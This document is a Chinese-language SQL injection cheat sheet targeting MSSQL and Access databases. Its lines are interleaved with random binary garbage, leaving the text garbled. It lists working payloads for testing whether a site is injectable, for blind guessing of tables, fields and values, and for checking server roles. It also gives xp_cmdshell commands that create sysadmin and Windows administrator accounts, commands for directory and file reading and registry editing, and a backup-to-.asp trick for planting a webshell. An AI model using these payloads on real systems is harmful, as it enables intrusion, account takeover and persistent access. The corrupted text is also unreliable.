1.判断是否有注入;and 1=1 ;and 1=2 n-0RA��~5z
2.初步判断是否是mssql ;and user>0 g"^���<LX-
&E0P`F,GQA
3.注入参数是字符'and [查询条件] and ''=' ��yKgA"NaM
|cU��TP!iy
4.搜索时没过滤参数的'and [查询条件] and '%25'=' N�"@ais�i)
yM��B*/�vs
5.判断数据库系统 xXQDHc�-Ba
)BmK�'H+l
;and (select count(*) from sysobjects)>0 mssql +<7`G�n(n3
|]*]�k`o<)
;and (select count(*) from msysobjects)>0 access �v��?vm-e�
�Davpj�wSn
:��[A�>O�(
���}y;s(4�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 %�9C_p]P*�
�ncjt�v"2R
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 z^'3f!:3 �
:���*k����
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 V]&0"HX2r!
<�XDYnWz��
9.(1)猜字段的ascii值(access) &3�#19v�7/
�x(ue
|UG
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 /J9|.];%r�
unY+/�p $�
(2)猜字段的ascii值(mssql) /-4�r�c�C�
N D`?T
&PK
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Y`.��F�Ss
B}Qpqa=_c�
10.测试权限结构(mssql)
BUvE~l.,|
q���&]���I
t4X:I&l-M:
8�6y�)+�h`
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- _=S��4H��
?H�3L�s~�R
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- D;�*P'%_Z
L"e8S�%UqX
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ��2� ,�R�O
'So,*>�]63
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ^}��8qP�Bz
�;n�`SF~CU
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Ti�:�P�Kpc
K8,Q^!5]"�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �.ww~'5b�0
�2<q.LQ�}<
;and 1=(select IS_MEMBER('db_owner'));-- 41d�B4Td5t
:QGgtTEV""
tX)l_�?jVH
R+}7]tva6C
11.添加mssql和系统的帐户 aGSix}�b1P
�8=�\}#F�
;exec master.dbo.sp_addlogin username;-- dX^ �^
@�7
;exec master.dbo.sp_password null,username,password;-- �(]ToBju��
\2]M�&n GT
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- )j�c`_{PQg
�����F/.nr
;exec master.dbo.xp_cmdshell 'net user username password s
aY;[�bz}
�#$-{hg{��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- *�5T^wZpj)
�^E-BB 6D�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 7\.�{�O$Q�
x)GpNkx�:
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- xw2�d�N�JL
��CvkZ<i){
��b%A�+k"d
0K�T^��V R
12.(1)遍历目录 lFJDdf2:$C
�]�40@yr�c
;create table dirs(paths varchar(100), id int) �w��jEyU�:
[P�_@-:(O
;insert dirs exec master.dbo.xp_dirtree 'c:\' rHngYcjR��
�Q>�d<4]�`
;and (select top 1 paths from dirs)>0
|k,M$�@5s
��eIC�av�p
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �yk�Md�H:
n[�+$a)�$8
sQ";�
t=yC
}aSTo"�~m#
(2)遍历目录 [8%R�*�}�
R�^*%y�jy9
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �g�$S|CqRG
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 sH_�B�*cr3
z}.Q~4 f0D
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �.s-V:k�5�
�E!��"�N}v
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �C"��7-lz�
<d�d�XvUCX
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �fmg�Xh)�=
CqFk(Td9-D
^]n:/kZ5"[
H"5�=�z7�w
13.mssql中的存储过程 � 2-$O$&s.
X^o��0t�^
xp_regenumvalues 注册表根键, 子键 1Y+g^�Z;G�
��U�,��Q��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 I�EmjW�w4�
0#y
�i�5�U
xp_regread 根键,子键,键值名 |&u4�Q /0
d�QljG.PiK
;exec xp_regread m:-��=�K��
~CX�1WPMI:
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 K�6Z�/���
0&Z+P?Wb4�
xp_regwrite 根键,子键, 值名, 值类型, 值 pE4yx5r�5�
�h�[(����.
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 .Q�VN�&UyZ
9 `+RmX;�m
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �i&�m�t�-�
pO�q9J�7BS
xp_regdeletevalue 根键,子键,值名 8{4SaT.-Rm
P�1G�;JK��
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 W!�Fu��7�a
g>*P}r~;^b
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
��:q34KP�
/�<
-+*79G
M!���4��}B
.o(S60iH!(
14.mssql的backup创建webshell �vw2yOL�RX
Q@(tyW+8U@
use model Q �ym=L(X�
���$*��$X5
create table cmd(str image); �L��S%;ZKJ
$�97EeE:{M
insert into cmd(str) values (''); q=x1:^�rVH
�^�~`�t
q+
backup database model to disk='c:\l.asp'; CNM�� pyr�
=w�q�uFA!c
Mw�td<7<!A
�;&9w�G�`
15.mssql内置函数 "3�0R%oL]=
BTnrg�s#�[
;and (select @@version)>0 获得Windows的版本号 '���*=�k�t
5H!6�m_,�w
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �E�}lN�b�
�A}W}H;8x
;and (select user_name())>0 爆当前系统的连接用户 6 K-j�je;)
8~|��t��l,
;and (select db_name())>0 得到当前连接的数据库 'U��*��Kb�
Y]neTX [ef
g9�G
��8;�
|R3A$�r#�-
16.简洁的webshell M
��_�e^KF
?#gYu�%7DN
use model >�A.m�`w��
2)T.�Ci cx
create table cmd(str image); W�.m2`] &�
(W'3Z�v'f�
insert into cmd(str) values (''); rUDMQxLruV
ov|/=bzr�o
backup database model to disk='g:\wwwtest\l.asp';
